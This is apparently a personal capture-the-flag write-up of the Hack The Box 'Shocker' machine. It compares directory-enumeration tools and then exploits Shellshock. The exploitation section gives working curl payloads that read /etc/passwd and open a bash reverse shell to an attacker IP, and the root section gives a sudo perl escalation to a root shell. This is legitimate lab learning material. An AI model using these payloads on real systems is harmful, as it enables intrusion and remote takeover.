HTB: Shocker
Shocker
Shocker was not technically next in line; Beep was. I have started Beep but I’ll return to that later. I didn’t know what this was but I guessed from the name.
Ports
HTTP and SSH on a non-standard port: 2222.
HTTP
On the front page of the webserver is a picture of a bug with a hammer and the phrase “don’t bug me”. I was guessing at this point that this was probably shellshock. Which it is. This then, is mostly an exercise in enumeration.
I’ve been liking dirsearch but on this box it let me down; observe:
┌──(root💀kali)-[/opt/htb/shocker]
└─# python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.56/cgi-bin -w /usr/share/seclists/Discovery/Web-Content/common.txt -e sh
/opt/dirsearch/thirdparty/requests/__init__.py:91: RequestsDependencyWarning: urllib3 (1.26.2) or chardet (4.0.0) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: sh | HTTP method: GET | Threads: 30 | Wordlist size: 4681
Error Log: /opt/dirsearch/logs/errors-21-03-14_00-02-19.log
Target: http://10.10.10.56/cgi-bin/
Output File: /opt/dirsearch/reports/10.10.10.56/cgi-bin_21-03-14_00-02-19.txt
[00:02:19] Starting:
Task Completed Nothing found, and it’s the same whether I use /cgi-bin/ or /cgi-bin without the trailing slash. What about gobuster, which was my old favourite before dirsearch?
┌──(root💀kali)-[/opt/htb/shocker]
└─# gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x sh
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56/cgi-bin/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: sh
[+] Timeout: 10s
===============================================================
2021/03/14 00:04:30 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 298]
/.htaccess (Status: 403) [Size: 303]
/.htpasswd (Status: 403) [Size: 303]
/.hta.sh (Status: 403) [Size: 301]
/.htaccess.sh (Status: 403) [Size: 306]
/.htpasswd.sh (Status: 403) [Size: 306]
/user.sh (Status: 200) [Size: 118]
===============================================================
2021/03/14 00:08:20 Finished
===============================================================Found it (user.sh) no problem. Very disappointing dirsearch. I’ve heard good things about feroxbuster lately; let’s try that:
┌──(root💀kali)-[/opt/htb/shocker]
└─# feroxbuster -u http://10.10.10.56/cgi-bin/ -x sh -w /usr/share/seclists/Discovery/Web-Content/common.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.2.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.56/cgi-bin/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.2.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💲 Extensions │ [sh]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200 7l 17w 0c http://10.10.10.56/cgi-bin/user.sh
403 11l 32w 303c http://10.10.10.56/cgi-bin/.htaccess
403 11l 32w 306c http://10.10.10.56/cgi-bin/.htaccess.sh
403 11l 32w 298c http://10.10.10.56/cgi-bin/.hta
403 11l 32w 301c http://10.10.10.56/cgi-bin/.hta.sh
403 11l 32w 303c http://10.10.10.56/cgi-bin/.htpasswd
403 11l 32w 306c http://10.10.10.56/cgi-bin/.htpasswd.sh
[####################] - 46s 9362/9362 0s found:7 errors:0
[####################] - 46s 9362/9362 202/s http://10.10.10.56/cgi-bin/Not only did it find it, but it was noticeably quicker than gobuster. A new king has been crowned.
Exploitation
Is trivial:
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://10.10.10.56/cgi-bin/user.sh
To show it’s working, and then a shell via:
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.10/1234 0>&1'" \
http://10.10.10.56/cgi-bin/user.sh
Root
GTFOBins from HTB? They don’t do that anymore:
──(root💀kali)-[/opt/htb/shocker]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.56] 37280
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/home/shelly$ sudo -u root /usr/bin/perl -e 'exec "/bin/sh";'
sudo -u root /usr/bin/perl -e 'exec "/bin/sh";'
cd /root
cat root.txt
# flag goes here
id;hostname
uid=0(root) gid=0(root) groups=0(root)
ShockerI also did h4cked and Badbyte from THM yesterday but I don’t have anything to say about them. Proxychains nmap was mildly interesting.